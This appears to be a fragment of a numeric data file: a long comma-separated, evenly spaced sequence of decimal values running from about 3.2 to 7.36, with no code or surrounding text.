3.199, 3.2, 3.201, 3.203, 3.204, 
3.206, 3.207, 3.208, 3.21, 3.211, 3.212, 3.214, 3.215, 3.217, 3.218, 3.219, 3.221, 3.222, 3.224, 3.225, 3.226, 3.228, 3.229, 3.231, 3.232, 3.233, 3.235, 3.236, 3.237, 3.239, 3.24, 3.242, 3.243, 3.244, 3.246, 3.247, 3.249, 3.25, 3.251, 3.253, 3.254, 3.256, 3.257, 3.258, 3.26, 3.261, 3.263, 3.264, 3.265, 3.267, 3.268, 3.269, 3.271, 3.272, 3.274, 3.275, 3.276, 3.278, 3.279, 3.281, 3.282, 3.283, 3.285, 3.286, 3.288, 3.289, 3.29, 3.292, 3.293, 3.294, 3.296, 3.297, 3.299, 3.3, 3.301, 3.303, 3.304, 3.306, 3.307, 3.308, 3.31, 3.311, 3.312, 3.314, 3.315, 3.317, 3.318, 3.319, 3.321, 3.322, 3.324, 3.325, 3.326, 3.328, 3.329, 3.331, 3.332, 3.333, 3.335, 3.336, 3.337, 3.339, 3.34, 3.342, 3.343, 3.344, 3.346, 3.347, 3.349, 3.35, 3.351, 3.353, 3.354, 3.356, 3.357, 3.358, 3.36, 3.361, 3.362, 3.364, 3.365, 3.367, 3.368, 3.369, 3.371, 3.372, 3.374, 3.375, 3.376, 3.378, 3.379, 3.381, 3.382, 3.383, 3.385, 3.386, 3.388, 3.389, 3.39, 3.392, 3.393, 3.394, 3.396, 3.397, 3.399, 3.4, 3.401, 3.403, 3.404, 3.406, 3.407, 3.408, 3.41, 3.411, 3.413, 3.414, 3.415, 3.417, 3.418, 3.419, 3.421, 3.422, 3.424, 3.425, 3.426, 3.428, 3.429, 3.431, 3.432, 3.433, 3.435, 3.436, 3.438, 3.439, 3.44, 3.442, 3.443, 3.444, 3.446, 3.447, 3.449, 3.45, 3.451, 3.453, 3.454, 3.456, 3.457, 3.458, 3.46, 3.461, 3.462, 3.464, 3.465, 3.467, 3.468, 3.469, 3.471, 3.472, 3.474, 3.475, 3.476, 3.478, 3.479, 3.481, 3.482, 3.483, 3.485, 3.486, 3.487, 3.489, 3.49, 3.492, 3.493, 3.494, 3.496, 3.497, 3.499, 3.5, 3.501, 3.503, 3.504, 3.506, 3.507, 3.508, 3.51, 3.511, 3.513, 3.514, 3.515, 3.517, 3.518, 3.519, 3.521, 3.522, 3.524, 3.525, 3.526, 3.528, 3.529, 3.531, 3.532, 3.533, 3.535, 3.536, 3.538, 3.539, 3.54, 3.542, 3.543, 3.544, 3.546, 3.547, 3.549, 3.55, 3.551, 3.553, 3.554, 3.556, 3.557, 3.558, 3.56, 3.561, 3.562, 3.564, 3.565, 3.567, 3.568, 3.569, 3.571, 3.572, 3.574, 3.575, 3.576, 3.578, 3.579, 3.581, 3.582, 3.583, 3.585, 3.586, 3.587, 3.589, 3.59, 3.592, 3.593, 3.594, 3.596, 3.597, 3.599, 3.6, 3.601, 3.603, 3.604, 3.606, 
3.607, 3.608, 3.61, 3.611, 3.612, 3.614, 3.615, 3.617, 3.618, 3.619, 3.621, 3.622, 3.624, 3.625, 3.626, 3.628, 3.629, 3.631, 3.632, 3.633, 3.635, 3.636, 3.638, 3.639, 3.64, 3.642, 3.643, 3.644, 3.646, 3.647, 3.649, 3.65, 3.651, 3.653, 3.654, 3.656, 3.657, 3.658, 3.66, 3.661, 3.663, 3.664, 3.665, 3.667, 3.668, 3.669, 3.671, 3.672, 3.674, 3.675, 3.676, 3.678, 3.679, 3.681, 3.682, 3.683, 3.685, 3.686, 3.688, 3.689, 3.69, 3.692, 3.693, 3.694, 3.696, 3.697, 3.699, 3.7, 3.701, 3.703, 3.704, 3.706, 3.707, 3.708, 3.71, 3.711, 3.712, 3.714, 3.715, 3.717, 3.718, 3.719, 3.721, 3.722, 3.724, 3.725, 3.726, 3.728, 3.729, 3.731, 3.732, 3.733, 3.735, 3.736, 3.737, 3.739, 3.74, 3.742, 3.743, 3.744, 3.746, 3.747, 3.749, 3.75, 3.751, 3.753, 3.754, 3.756, 3.757, 3.758, 3.76, 3.761, 3.763, 3.764, 3.765, 3.767, 3.768, 3.769, 3.771, 3.772, 3.774, 3.775, 3.776, 3.778, 3.779, 3.781, 3.782, 3.783, 3.785, 3.786, 3.788, 3.789, 3.79, 3.792, 3.793, 3.794, 3.796, 3.797, 3.799, 3.8, 3.801, 3.803, 3.804, 3.806, 3.807, 3.808, 3.81, 3.811, 3.812, 3.814, 3.815, 3.817, 3.818, 3.819, 3.821, 3.822, 3.824, 3.825, 3.826, 3.828, 3.829, 3.831, 3.832, 3.833, 3.835, 3.836, 3.837, 3.839, 3.84, 3.842, 3.843, 3.844, 3.846, 3.847, 3.849, 3.85, 3.851, 3.853, 3.854, 3.856, 3.857, 3.858, 3.86, 3.861, 3.862, 3.864, 3.865, 3.867, 3.868, 3.869, 3.871, 3.872, 3.874, 3.875, 3.876, 3.878, 3.879, 3.881, 3.882, 3.883, 3.885, 3.886, 3.888, 3.889, 3.89, 3.892, 3.893, 3.894, 3.896, 3.897, 3.899, 3.9, 3.901, 3.903, 3.904, 3.906, 3.907, 3.908, 3.91, 3.911, 3.913, 3.914, 3.915, 3.917, 3.918, 3.919, 3.921, 3.922, 3.924, 3.925, 3.926, 3.928, 3.929, 3.931, 3.932, 3.933, 3.935, 3.936, 3.938, 3.939, 3.94, 3.942, 3.943, 3.944, 3.946, 3.947, 3.949, 3.95, 3.951, 3.953, 3.954, 3.956, 3.957, 3.958, 3.96, 3.961, 3.962, 3.964, 3.965, 3.967, 3.968, 3.969, 3.971, 3.972, 3.974, 3.975, 3.976, 3.978, 3.979, 3.981, 3.982, 3.983, 3.985, 3.986, 3.987, 3.989, 3.99, 3.992, 3.993, 3.994, 3.996, 3.997, 3.999, 4.0, 4.001, 4.003, 4.004, 4.006, 4.007, 
4.008, 4.01, 4.011, 4.013, 4.014, 4.015, 4.017, 4.018, 4.019, 4.021, 4.022, 4.024, 4.025, 4.026, 4.028, 4.029, 4.031, 4.032, 4.033, 4.035, 4.036, 4.037, 4.039, 4.04, 4.042, 4.043, 4.044, 4.046, 4.047, 4.049, 4.05, 4.051, 4.053, 4.054, 4.056, 4.057, 4.058, 4.06, 4.061, 4.062, 4.064, 4.065, 4.067, 4.068, 4.069, 4.071, 4.072, 4.074, 4.075, 4.076, 4.078, 4.079, 4.081, 4.082, 4.083, 4.085, 4.086, 4.088, 4.089, 4.09, 4.092, 4.093, 4.094, 4.096, 4.097, 4.099, 4.1, 4.101, 4.103, 4.104, 4.106, 4.107, 4.108, 4.11, 4.111, 4.112, 4.114, 4.115, 4.117, 4.118, 4.119, 4.121, 4.122, 4.124, 4.125, 4.126, 4.128, 4.129, 4.131, 4.132, 4.133, 4.135, 4.136, 4.138, 4.139, 4.14, 4.142, 4.143, 4.144, 4.146, 4.147, 4.149, 4.15, 4.151, 4.153, 4.154, 4.156, 4.157, 4.158, 4.16, 4.161, 4.162, 4.164, 4.165, 4.167, 4.168, 4.169, 4.171, 4.172, 4.174, 4.175, 4.176, 4.178, 4.179, 4.181, 4.182, 4.183, 4.185, 4.186, 4.188, 4.189, 4.19, 4.192, 4.193, 4.194, 4.196, 4.197, 4.199, 4.2, 4.201, 4.203, 4.204, 4.206, 4.207, 4.208, 4.21, 4.211, 4.213, 4.214, 4.215, 4.217, 4.218, 4.219, 4.221, 4.222, 4.224, 4.225, 4.226, 4.228, 4.229, 4.231, 4.232, 4.233, 4.235, 4.236, 4.237, 4.239, 4.24, 4.242, 4.243, 4.244, 4.246, 4.247, 4.249, 4.25, 4.251, 4.253, 4.254, 4.256, 4.257, 4.258, 4.26, 4.261, 4.263, 4.264, 4.265, 4.267, 4.268, 4.269, 4.271, 4.272, 4.274, 4.275, 4.276, 4.278, 4.279, 4.281, 4.282, 4.283, 4.285, 4.286, 4.287, 4.289, 4.29, 4.292, 4.293, 4.294, 4.296, 4.297, 4.299, 4.3, 4.301, 4.303, 4.304, 4.306, 4.307, 4.308, 4.31, 4.311, 4.312, 4.314, 4.315, 4.317, 4.318, 4.319, 4.321, 4.322, 4.324, 4.325, 4.326, 4.328, 4.329, 4.331, 4.332, 4.333, 4.335, 4.336, 4.338, 4.339, 4.34, 4.342, 4.343, 4.344, 4.346, 4.347, 4.349, 4.35, 4.351, 4.353, 4.354, 4.356, 4.357, 4.358, 4.36, 4.361, 4.362, 4.364, 4.365, 4.367, 4.368, 4.369, 4.371, 4.372, 4.374, 4.375, 4.376, 4.378, 4.379, 4.381, 4.382, 4.383, 4.385, 4.386, 4.388, 4.389, 4.39, 4.392, 4.393, 4.394, 4.396, 4.397, 4.399, 4.4, 4.401, 4.403, 4.404, 4.406, 4.407, 4.408, 
4.41, 4.411, 4.412, 4.414, 4.415, 4.417, 4.418, 4.419, 4.421, 4.422, 4.424, 4.425, 4.426, 4.428, 4.429, 4.431, 4.432, 4.433, 4.435, 4.436, 4.438, 4.439, 4.44, 4.442, 4.443, 4.444, 4.446, 4.447, 4.449, 4.45, 4.451, 4.453, 4.454, 4.456, 4.457, 4.458, 4.46, 4.461, 4.463, 4.464, 4.465, 4.467, 4.468, 4.469, 4.471, 4.472, 4.474, 4.475, 4.476, 4.478, 4.479, 4.481, 4.482, 4.483, 4.485, 4.486, 4.487, 4.489, 4.49, 4.492, 4.493, 4.494, 4.496, 4.497, 4.499, 4.5, 4.501, 4.503, 4.504, 4.506, 4.507, 4.508, 4.51, 4.511, 4.513, 4.514, 4.515, 4.517, 4.518, 4.519, 4.521, 4.522, 4.524, 4.525, 4.526, 4.528, 4.529, 4.531, 4.532, 4.533, 4.535, 4.536, 4.537, 4.539, 4.54, 4.542, 4.543, 4.544, 4.546, 4.547, 4.549, 4.55, 4.551, 4.553, 4.554, 4.556, 4.557, 4.558, 4.56, 4.561, 4.562, 4.564, 4.565, 4.567, 4.568, 4.569, 4.571, 4.572, 4.574, 4.575, 4.576, 4.578, 4.579, 4.581, 4.582, 4.583, 4.585, 4.586, 4.588, 4.589, 4.59, 4.592, 4.593, 4.594, 4.596, 4.597, 4.599, 4.6, 4.601, 4.603, 4.604, 4.606, 4.607, 4.608, 4.61, 4.611, 4.612, 4.614, 4.615, 4.617, 4.618, 4.619, 4.621, 4.622, 4.624, 4.625, 4.626, 4.628, 4.629, 4.631, 4.632, 4.633, 4.635, 4.636, 4.638, 4.639, 4.64, 4.642, 4.643, 4.644, 4.646, 4.647, 4.649, 4.65, 4.651, 4.653, 4.654, 4.656, 4.657, 4.658, 4.66, 4.661, 4.662, 4.664, 4.665, 4.667, 4.668, 4.669, 4.671, 4.672, 4.674, 4.675, 4.676, 4.678, 4.679, 4.681, 4.682, 4.683, 4.685, 4.686, 4.688, 4.689, 4.69, 4.692, 4.693, 4.694, 4.696, 4.697, 4.699, 4.7, 4.701, 4.703, 4.704, 4.706, 4.707, 4.708, 4.71, 4.711, 4.713, 4.714, 4.715, 4.717, 4.718, 4.719, 4.721, 4.722, 4.724, 4.725, 4.726, 4.728, 4.729, 4.731, 4.732, 4.733, 4.735, 4.736, 4.737, 4.739, 4.74, 4.742, 4.743, 4.744, 4.746, 4.747, 4.749, 4.75, 4.751, 4.753, 4.754, 4.756, 4.757, 4.758, 4.76, 4.761, 4.763, 4.764, 4.765, 4.767, 4.768, 4.769, 4.771, 4.772, 4.774, 4.775, 4.776, 4.778, 4.779, 4.781, 4.782, 4.783, 4.785, 4.786, 4.787, 4.789, 4.79, 4.792, 4.793, 4.794, 4.796, 4.797, 4.799, 4.8, 4.801, 4.803, 4.804, 4.806, 4.807, 4.808, 4.81, 
4.811, 4.812, 4.814, 4.815, 4.817, 4.818, 4.819, 4.821, 4.822, 4.824, 4.825, 4.826, 4.828, 4.829, 4.831, 4.832, 4.833, 4.835, 4.836, 4.838, 4.839, 4.84, 4.842, 4.843, 4.844, 4.846, 4.847, 4.849, 4.85, 4.851, 4.853, 4.854, 4.856, 4.857, 4.858, 4.86, 4.861, 4.862, 4.864, 4.865, 4.867, 4.868, 4.869, 4.871, 4.872, 4.874, 4.875, 4.876, 4.878, 4.879, 4.881, 4.882, 4.883, 4.885, 4.886, 4.888, 4.889, 4.89, 4.892, 4.893, 4.894, 4.896, 4.897, 4.899, 4.9, 4.901, 4.903, 4.904, 4.906, 4.907, 4.908, 4.91, 4.911, 4.912, 4.914, 4.915, 4.917, 4.918, 4.919, 4.921, 4.922, 4.924, 4.925, 4.926, 4.928, 4.929, 4.931, 4.932, 4.933, 4.935, 4.936, 4.938, 4.939, 4.94, 4.942, 4.943, 4.944, 4.946, 4.947, 4.949, 4.95, 4.951, 4.953, 4.954, 4.956, 4.957, 4.958, 4.96, 4.961, 4.963, 4.964, 4.965, 4.967, 4.968, 4.969, 4.971, 4.972, 4.974, 4.975, 4.976, 4.978, 4.979, 4.981, 4.982, 4.983, 4.985, 4.986, 4.987, 4.989, 4.99, 4.992, 4.993, 4.994, 4.996, 4.997, 4.999, 5.0, 5.001, 5.003, 5.004, 5.006, 5.007, 5.008, 5.01, 5.011, 5.013, 5.014, 5.015, 5.017, 5.018, 5.019, 5.021, 5.022, 5.024, 5.025, 5.026, 5.028, 5.029, 5.031, 5.032, 5.033, 5.035, 5.036, 5.037, 5.039, 5.04, 5.042, 5.043, 5.044, 5.046, 5.047, 5.049, 5.05, 5.051, 5.053, 5.054, 5.056, 5.057, 5.058, 5.06, 5.061, 5.062, 5.064, 5.065, 5.067, 5.068, 5.069, 5.071, 5.072, 5.074, 5.075, 5.076, 5.078, 5.079, 5.081, 5.082, 5.083, 5.085, 5.086, 5.088, 5.089, 5.09, 5.092, 5.093, 5.094, 5.096, 5.097, 5.099, 5.1, 5.101, 5.103, 5.104, 5.106, 5.107, 5.108, 5.11, 5.111, 5.112, 5.114, 5.115, 5.117, 5.118, 5.119, 5.121, 5.122, 5.124, 5.125, 5.126, 5.128, 5.129, 5.131, 5.132, 5.133, 5.135, 5.136, 5.138, 5.139, 5.14, 5.142, 5.143, 5.144, 5.146, 5.147, 5.149, 5.15, 5.151, 5.153, 5.154, 5.156, 5.157, 5.158, 5.16, 5.161, 5.162, 5.164, 5.165, 5.167, 5.168, 5.169, 5.171, 5.172, 5.174, 5.175, 5.176, 5.178, 5.179, 5.181, 5.182, 5.183, 5.185, 5.186, 5.188, 5.189, 5.19, 5.192, 5.193, 5.194, 5.196, 5.197, 5.199, 5.2, 5.201, 5.203, 5.204, 5.206, 5.207, 5.208, 5.21, 5.211, 
5.213, 5.214, 5.215, 5.217, 5.218, 5.219, 5.221, 5.222, 5.224, 5.225, 5.226, 5.228, 5.229, 5.231, 5.232, 5.233, 5.235, 5.236, 5.237, 5.239, 5.24, 5.242, 5.243, 5.244, 5.246, 5.247, 5.249, 5.25, 5.251, 5.253, 5.254, 5.256, 5.257, 5.258, 5.26, 5.261, 5.263, 5.264, 5.265, 5.267, 5.268, 5.269, 5.271, 5.272, 5.274, 5.275, 5.276, 5.278, 5.279, 5.281, 5.282, 5.283, 5.285, 5.286, 5.287, 5.289, 5.29, 5.292, 5.293, 5.294, 5.296, 5.297, 5.299, 5.3, 5.301, 5.303, 5.304, 5.306, 5.307, 5.308, 5.31, 5.311, 5.312, 5.314, 5.315, 5.317, 5.318, 5.319, 5.321, 5.322, 5.324, 5.325, 5.326, 5.328, 5.329, 5.331, 5.332, 5.333, 5.335, 5.336, 5.338, 5.339, 5.34, 5.342, 5.343, 5.344, 5.346, 5.347, 5.349, 5.35, 5.351, 5.353, 5.354, 5.356, 5.357, 5.358, 5.36, 5.361, 5.362, 5.364, 5.365, 5.367, 5.368, 5.369, 5.371, 5.372, 5.374, 5.375, 5.376, 5.378, 5.379, 5.381, 5.382, 5.383, 5.385, 5.386, 5.388, 5.389, 5.39, 5.392, 5.393, 5.394, 5.396, 5.397, 5.399, 5.4, 5.401, 5.403, 5.404, 5.406, 5.407, 5.408, 5.41, 5.411, 5.412, 5.414, 5.415, 5.417, 5.418, 5.419, 5.421, 5.422, 5.424, 5.425, 5.426, 5.428, 5.429, 5.431, 5.432, 5.433, 5.435, 5.436, 5.438, 5.439, 5.44, 5.442, 5.443, 5.444, 5.446, 5.447, 5.449, 5.45, 5.451, 5.453, 5.454, 5.456, 5.457, 5.458, 5.46, 5.461, 5.463, 5.464, 5.465, 5.467, 5.468, 5.469, 5.471, 5.472, 5.474, 5.475, 5.476, 5.478, 5.479, 5.481, 5.482, 5.483, 5.485, 5.486, 5.487, 5.489, 5.49, 5.492, 5.493, 5.494, 5.496, 5.497, 5.499, 5.5, 5.501, 5.503, 5.504, 5.506, 5.507, 5.508, 5.51, 5.511, 5.513, 5.514, 5.515, 5.517, 5.518, 5.519, 5.521, 5.522, 5.524, 5.525, 5.526, 5.528, 5.529, 5.531, 5.532, 5.533, 5.535, 5.536, 5.537, 5.539, 5.54, 5.542, 5.543, 5.544, 5.546, 5.547, 5.549, 5.55, 5.551, 5.553, 5.554, 5.556, 5.557, 5.558, 5.56, 5.561, 5.562, 5.564, 5.565, 5.567, 5.568, 5.569, 5.571, 5.572, 5.574, 5.575, 5.576, 5.578, 5.579, 5.581, 5.582, 5.583, 5.585, 5.586, 5.588, 5.589, 5.59, 5.592, 5.593, 5.594, 5.596, 5.597, 5.599, 5.6, 5.601, 5.603, 5.604, 5.606, 5.607, 5.608, 5.61, 5.611, 5.612, 
5.614, 5.615, 5.617, 5.618, 5.619, 5.621, 5.622, 5.624, 5.625, 5.626, 5.628, 5.629, 5.631, 5.632, 5.633, 5.635, 5.636, 5.638, 5.639, 5.64, 5.642, 5.643, 5.644, 5.646, 5.647, 5.649, 5.65, 5.651, 5.653, 5.654, 5.656, 5.657, 5.658, 5.66, 5.661, 5.662, 5.664, 5.665, 5.667, 5.668, 5.669, 5.671, 5.672, 5.674, 5.675, 5.676, 5.678, 5.679, 5.681, 5.682, 5.683, 5.685, 5.686, 5.688, 5.689, 5.69, 5.692, 5.693, 5.694, 5.696, 5.697, 5.699, 5.7, 5.701, 5.703, 5.704, 5.706, 5.707, 5.708, 5.71, 5.711, 5.713, 5.714, 5.715, 5.717, 5.718, 5.719, 5.721, 5.722, 5.724, 5.725, 5.726, 5.728, 5.729, 5.731, 5.732, 5.733, 5.735, 5.736, 5.737, 5.739, 5.74, 5.742, 5.743, 5.744, 5.746, 5.747, 5.749, 5.75, 5.751, 5.753, 5.754, 5.756, 5.757, 5.758, 5.76, 5.761, 5.763, 5.764, 5.765, 5.767, 5.768, 5.769, 5.771, 5.772, 5.774, 5.775, 5.776, 5.778, 5.779, 5.781, 5.782, 5.783, 5.785, 5.786, 5.787, 5.789, 5.79, 5.792, 5.793, 5.794, 5.796, 5.797, 5.799, 5.8, 5.801, 5.803, 5.804, 5.806, 5.807, 5.808, 5.81, 5.811, 5.812, 5.814, 5.815, 5.817, 5.818, 5.819, 5.821, 5.822, 5.824, 5.825, 5.826, 5.828, 5.829, 5.831, 5.832, 5.833, 5.835, 5.836, 5.838, 5.839, 5.84, 5.842, 5.843, 5.844, 5.846, 5.847, 5.849, 5.85, 5.851, 5.853, 5.854, 5.856, 5.857, 5.858, 5.86, 5.861, 5.862, 5.864, 5.865, 5.867, 5.868, 5.869, 5.871, 5.872, 5.874, 5.875, 5.876, 5.878, 5.879, 5.881, 5.882, 5.883, 5.885, 5.886, 5.888, 5.889, 5.89, 5.892, 5.893, 5.894, 5.896, 5.897, 5.899, 5.9, 5.901, 5.903, 5.904, 5.906, 5.907, 5.908, 5.91, 5.911, 5.912, 5.914, 5.915, 5.917, 5.918, 5.919, 5.921, 5.922, 5.924, 5.925, 5.926, 5.928, 5.929, 5.931, 5.932, 5.933, 5.935, 5.936, 5.938, 5.939, 5.94, 5.942, 5.943, 5.944, 5.946, 5.947, 5.949, 5.95, 5.951, 5.953, 5.954, 5.956, 5.957, 5.958, 5.96, 5.961, 5.963, 5.964, 5.965, 5.967, 5.968, 5.969, 5.971, 5.972, 5.974, 5.975, 5.976, 5.978, 5.979, 5.981, 5.982, 5.983, 5.985, 5.986, 5.987, 5.989, 5.99, 5.992, 5.993, 5.994, 5.996, 5.997, 5.999, 6.0, 6.001, 6.003, 6.004, 6.006, 6.007, 6.008, 6.01, 6.011, 6.013, 6.014, 
6.015, 6.017, 6.018, 6.019, 6.021, 6.022, 6.024, 6.025, 6.026, 6.028, 6.029, 6.031, 6.032, 6.033, 6.035, 6.036, 6.037, 6.039, 6.04, 6.042, 6.043, 6.044, 6.046, 6.047, 6.049, 6.05, 6.051, 6.053, 6.054, 6.056, 6.057, 6.058, 6.06, 6.061, 6.062, 6.064, 6.065, 6.067, 6.068, 6.069, 6.071, 6.072, 6.074, 6.075, 6.076, 6.078, 6.079, 6.081, 6.082, 6.083, 6.085, 6.086, 6.088, 6.089, 6.09, 6.092, 6.093, 6.094, 6.096, 6.097, 6.099, 6.1, 6.101, 6.103, 6.104, 6.106, 6.107, 6.108, 6.11, 6.111, 6.112, 6.114, 6.115, 6.117, 6.118, 6.119, 6.121, 6.122, 6.124, 6.125, 6.126, 6.128, 6.129, 6.131, 6.132, 6.133, 6.135, 6.136, 6.138, 6.139, 6.14, 6.142, 6.143, 6.144, 6.146, 6.147, 6.149, 6.15, 6.151, 6.153, 6.154, 6.156, 6.157, 6.158, 6.16, 6.161, 6.162, 6.164, 6.165, 6.167, 6.168, 6.169, 6.171, 6.172, 6.174, 6.175, 6.176, 6.178, 6.179, 6.181, 6.182, 6.183, 6.185, 6.186, 6.188, 6.189, 6.19, 6.192, 6.193, 6.194, 6.196, 6.197, 6.199, 6.2, 6.201, 6.203, 6.204, 6.206, 6.207, 6.208, 6.21, 6.211, 6.213, 6.214, 6.215, 6.217, 6.218, 6.219, 6.221, 6.222, 6.224, 6.225, 6.226, 6.228, 6.229, 6.231, 6.232, 6.233, 6.235, 6.236, 6.237, 6.239, 6.24, 6.242, 6.243, 6.244, 6.246, 6.247, 6.249, 6.25, 6.251, 6.253, 6.254, 6.256, 6.257, 6.258, 6.26, 6.261, 6.263, 6.264, 6.265, 6.267, 6.268, 6.269, 6.271, 6.272, 6.274, 6.275, 6.276, 6.278, 6.279, 6.281, 6.282, 6.283, 6.285, 6.286, 6.287, 6.289, 6.29, 6.292, 6.293, 6.294, 6.296, 6.297, 6.299, 6.3, 6.301, 6.303, 6.304, 6.306, 6.307, 6.308, 6.31, 6.311, 6.312, 6.314, 6.315, 6.317, 6.318, 6.319, 6.321, 6.322, 6.324, 6.325, 6.326, 6.328, 6.329, 6.331, 6.332, 6.333, 6.335, 6.336, 6.338, 6.339, 6.34, 6.342, 6.343, 6.344, 6.346, 6.347, 6.349, 6.35, 6.351, 6.353, 6.354, 6.356, 6.357, 6.358, 6.36, 6.361, 6.362, 6.364, 6.365, 6.367, 6.368, 6.369, 6.371, 6.372, 6.374, 6.375, 6.376, 6.378, 6.379, 6.381, 6.382, 6.383, 6.385, 6.386, 6.388, 6.389, 6.39, 6.392, 6.393, 6.394, 6.396, 6.397, 6.399, 6.4, 6.401, 6.403, 6.404, 6.406, 6.407, 6.408, 6.41, 6.411, 6.412, 6.414, 6.415, 
6.417, 6.418, 6.419, 6.421, 6.422, 6.424, 6.425, 6.426, 6.428, 6.429, 6.431, 6.432, 6.433, 6.435, 6.436, 6.438, 6.439, 6.44, 6.442, 6.443, 6.444, 6.446, 6.447, 6.449, 6.45, 6.451, 6.453, 6.454, 6.456, 6.457, 6.458, 6.46, 6.461, 6.463, 6.464, 6.465, 6.467, 6.468, 6.469, 6.471, 6.472, 6.474, 6.475, 6.476, 6.478, 6.479, 6.481, 6.482, 6.483, 6.485, 6.486, 6.487, 6.489, 6.49, 6.492, 6.493, 6.494, 6.496, 6.497, 6.499, 6.5, 6.501, 6.503, 6.504, 6.506, 6.507, 6.508, 6.51, 6.511, 6.513, 6.514, 6.515, 6.517, 6.518, 6.519, 6.521, 6.522, 6.524, 6.525, 6.526, 6.528, 6.529, 6.531, 6.532, 6.533, 6.535, 6.536, 6.537, 6.539, 6.54, 6.542, 6.543, 6.544, 6.546, 6.547, 6.549, 6.55, 6.551, 6.553, 6.554, 6.556, 6.557, 6.558, 6.56, 6.561, 6.562, 6.564, 6.565, 6.567, 6.568, 6.569, 6.571, 6.572, 6.574, 6.575, 6.576, 6.578, 6.579, 6.581, 6.582, 6.583, 6.585, 6.586, 6.588, 6.589, 6.59, 6.592, 6.593, 6.594, 6.596, 6.597, 6.599, 6.6, 6.601, 6.603, 6.604, 6.606, 6.607, 6.608, 6.61, 6.611, 6.612, 6.614, 6.615, 6.617, 6.618, 6.619, 6.621, 6.622, 6.624, 6.625, 6.626, 6.628, 6.629, 6.631, 6.632, 6.633, 6.635, 6.636, 6.638, 6.639, 6.64, 6.642, 6.643, 6.644, 6.646, 6.647, 6.649, 6.65, 6.651, 6.653, 6.654, 6.656, 6.657, 6.658, 6.66, 6.661, 6.662, 6.664, 6.665, 6.667, 6.668, 6.669, 6.671, 6.672, 6.674, 6.675, 6.676, 6.678, 6.679, 6.681, 6.682, 6.683, 6.685, 6.686, 6.688, 6.689, 6.69, 6.692, 6.693, 6.694, 6.696, 6.697, 6.699, 6.7, 6.701, 6.703, 6.704, 6.706, 6.707, 6.708, 6.71, 6.711, 6.713, 6.714, 6.715, 6.717, 6.718, 6.719, 6.721, 6.722, 6.724, 6.725, 6.726, 6.728, 6.729, 6.731, 6.732, 6.733, 6.735, 6.736, 6.737, 6.739, 6.74, 6.742, 6.743, 6.744, 6.746, 6.747, 6.749, 6.75, 6.751, 6.753, 6.754, 6.756, 6.757, 6.758, 6.76, 6.761, 6.763, 6.764, 6.765, 6.767, 6.768, 6.769, 6.771, 6.772, 6.774, 6.775, 6.776, 6.778, 6.779, 6.781, 6.782, 6.783, 6.785, 6.786, 6.787, 6.789, 6.79, 6.792, 6.793, 6.794, 6.796, 6.797, 6.799, 6.8, 6.801, 6.803, 6.804, 6.806, 6.807, 6.808, 6.81, 6.811, 6.812, 6.814, 6.815, 6.817, 
6.818, 6.819, 6.821, 6.822, 6.824, 6.825, 6.826, 6.828, 6.829, 6.831, 6.832, 6.833, 6.835, 6.836, 6.838, 6.839, 6.84, 6.842, 6.843, 6.844, 6.846, 6.847, 6.849, 6.85, 6.851, 6.853, 6.854, 6.856, 6.857, 6.858, 6.86, 6.861, 6.862, 6.864, 6.865, 6.867, 6.868, 6.869, 6.871, 6.872, 6.874, 6.875, 6.876, 6.878, 6.879, 6.881, 6.882, 6.883, 6.885, 6.886, 6.888, 6.889, 6.89, 6.892, 6.893, 6.894, 6.896, 6.897, 6.899, 6.9, 6.901, 6.903, 6.904, 6.906, 6.907, 6.908, 6.91, 6.911, 6.912, 6.914, 6.915, 6.917, 6.918, 6.919, 6.921, 6.922, 6.924, 6.925, 6.926, 6.928, 6.929, 6.931, 6.932, 6.933, 6.935, 6.936, 6.938, 6.939, 6.94, 6.942, 6.943, 6.944, 6.946, 6.947, 6.949, 6.95, 6.951, 6.953, 6.954, 6.956, 6.957, 6.958, 6.96, 6.961, 6.963, 6.964, 6.965, 6.967, 6.968, 6.969, 6.971, 6.972, 6.974, 6.975, 6.976, 6.978, 6.979, 6.981, 6.982, 6.983, 6.985, 6.986, 6.987, 6.989, 6.99, 6.992, 6.993, 6.994, 6.996, 6.997, 6.999, 7.0, 7.001, 7.003, 7.004, 7.006, 7.007, 7.008, 7.01, 7.011, 7.013, 7.014, 7.015, 7.017, 7.018, 7.019, 7.021, 7.022, 7.024, 7.025, 7.026, 7.028, 7.029, 7.031, 7.032, 7.033, 7.035, 7.036, 7.037, 7.039, 7.04, 7.042, 7.043, 7.044, 7.046, 7.047, 7.049, 7.05, 7.051, 7.053, 7.054, 7.056, 7.057, 7.058, 7.06, 7.061, 7.062, 7.064, 7.065, 7.067, 7.068, 7.069, 7.071, 7.072, 7.074, 7.075, 7.076, 7.078, 7.079, 7.081, 7.082, 7.083, 7.085, 7.086, 7.088, 7.089, 7.09, 7.092, 7.093, 7.094, 7.096, 7.097, 7.099, 7.1, 7.101, 7.103, 7.104, 7.106, 7.107, 7.108, 7.11, 7.111, 7.112, 7.114, 7.115, 7.117, 7.118, 7.119, 7.121, 7.122, 7.124, 7.125, 7.126, 7.128, 7.129, 7.131, 7.132, 7.133, 7.135, 7.136, 7.138, 7.139, 7.14, 7.142, 7.143, 7.144, 7.146, 7.147, 7.149, 7.15, 7.151, 7.153, 7.154, 7.156, 7.157, 7.158, 7.16, 7.161, 7.162, 7.164, 7.165, 7.167, 7.168, 7.169, 7.171, 7.172, 7.174, 7.175, 7.176, 7.178, 7.179, 7.181, 7.182, 7.183, 7.185, 7.186, 7.188, 7.189, 7.19, 7.192, 7.193, 7.194, 7.196, 7.197, 7.199, 7.2, 7.201, 7.203, 7.204, 7.206, 7.207, 7.208, 7.21, 7.211, 7.213, 7.214, 7.215, 7.217, 7.218, 
7.219, 7.221, 7.222, 7.224, 7.225, 7.226, 7.228, 7.229, 7.231, 7.232, 7.233, 7.235, 7.236, 7.237, 7.239, 7.24, 7.242, 7.243, 7.244, 7.246, 7.247, 7.249, 7.25, 7.251, 7.253, 7.254, 7.256, 7.257, 7.258, 7.26, 7.261, 7.263, 7.264, 7.265, 7.267, 7.268, 7.269, 7.271, 7.272, 7.274, 7.275, 7.276, 7.278, 7.279, 7.281, 7.282, 7.283, 7.285, 7.286, 7.287, 7.289, 7.29, 7.292, 7.293, 7.294, 7.296, 7.297, 7.299, 7.3, 7.301, 7.303, 7.304, 7.306, 7.307, 7.308, 7.31, 7.311, 7.312, 7.314, 7.315, 7.317, 7.318, 7.319, 7.321, 7.322, 7.324, 7.325, 7.326, 7.328, 7.329, 7.331, 7.332, 7.333, 7.335, 7.336, 7.338, 7.339, 7.34, 7.342, 7.343, 7.344, 7.346, 7.347, 7.349, 7.35, 7.351, 7.353, 7.354, 7.356, 7.357, 7.358, 7.36, 